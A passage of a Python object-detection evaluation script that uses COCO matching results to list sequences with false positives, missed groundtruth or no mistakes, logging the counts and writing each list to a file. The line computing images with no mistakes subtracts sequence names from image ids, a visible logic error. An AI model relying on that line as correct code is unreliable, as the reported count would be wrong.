and matched_groundtruth == 0):
images_with_unmatched_detections.add(image_id)
detection_id_to_index = {
detection_id: index
for index, detection_id in enumerate(eval_info['dtIds'])
}
# groundtruth_to_detection[g] contains the id of the detection
# matched to groundtruth g, or 0 if there is no match.
groundtruth_to_detection = eval_info['gtMatches'][iou_index].tolist()
groundtruth_ids = eval_info['gtIds']
for groundtruth_id, detection_match in zip(groundtruth_ids,
groundtruth_to_detection):
assert detection_match.is_integer()
if detection_match != 0:
detection_score = detection_scores[detection_id_to_index[int(
detection_match)]]
if (detection_match == 0
or detection_score < args.score_threshold):
images_with_missed_groundtruth.add(image_id)
sequences_with_unmatched_detections = set(
Path(coco_eval.cocoGt.imgs[image_id]['file_name']).parent.name
for image_id in images_with_unmatched_detections)
sequences_with_missed_groundtruth = set(
Path(coco_eval.cocoGt.imgs[image_id]['file_name']).parent.name
for image_id in images_with_missed_groundtruth)
images_with_no_mistakes = (
set(coco_eval.cocoGt.imgs.keys()) - sequences_with_unmatched_detections
- sequences_with_missed_groundtruth)
all_sequences = set(
Path(coco_eval.cocoGt.imgs[image_id]['file_name']).parent.name
for image_id in coco_eval.cocoGt.imgs.keys())
sequences_with_no_mistakes = (
all_sequences - sequences_with_missed_groundtruth -
sequences_with_unmatched_detections)
sequences_with_unmatched_detections = sorted(
sequences_with_unmatched_detections)
logging.info('Num images with unmatched detections: %s',
len(images_with_unmatched_detections))
logging.info('Num sequences with unmatched detections: %s',
len(sequences_with_unmatched_detections))
logging.info('Sequences with unmatched detections: %s',
', '.join(sequences_with_unmatched_detections))
with open(args.output_dir / 'false-positive-sequences.txt', 'w') as f:
f.write('\n'.join(sequences_with_unmatched_detections))
sequences_with_missed_groundtruth = sorted(
sequences_with_missed_groundtruth)
logging.info('Num images with missed groundtruth: %s',
len(images_with_missed_groundtruth))
logging.info('Num sequences with missed groundtruth: %s',
len(sequences_with_missed_groundtruth))
logging.info('Sequences with missed groundtruth: %s',
', '.join(sorted(sequences_with_missed_groundtruth)))
with open(args.output_dir / 'false-negative-sequences.txt', 'w') as f:
f.write('\n'.join(sequences_with_missed_groundtruth))
sequences_with_no_mistakes = sorted(sequences_with_no_mistakes)
logging.info('Num images with no mistakes: %s',
len(images_with_no_mistakes))
logging.info('Num sequences with no mistakes: %s',
len(sequences_with_no_mistakes))
logging.info('Sequences with no mistakes: %s',
', '.join(sequences_with_no_mistakes))
with open(args.output_dir / 'no-mistake-sequences.txt', 'w') as f:
f.write('\n'.join(sequences_with_no_mistakes))
if __name__ == "__main__":
main() | 0.456894 | 0.227942 |